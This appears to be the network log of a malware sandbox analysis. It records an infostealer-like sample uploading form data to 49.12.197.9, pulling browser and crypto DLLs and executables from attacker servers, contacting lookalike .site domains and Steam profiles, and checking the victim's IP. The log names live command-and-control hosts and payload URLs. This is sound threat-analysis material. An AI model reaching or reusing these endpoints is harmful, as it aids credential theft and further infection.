                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 7265Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 139641Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 7201Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 7157Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 7157Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
                            Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
                            Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
                            Source: global trafficHTTP traffic detected: HEAD /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: HEAD /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 349Host: 41.216.188.190
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3189Connection: Keep-AliveCache-Control: no-cache
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0050BBB0 InternetOpenA,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,6_2_0050BBB0
                            Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
                            Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
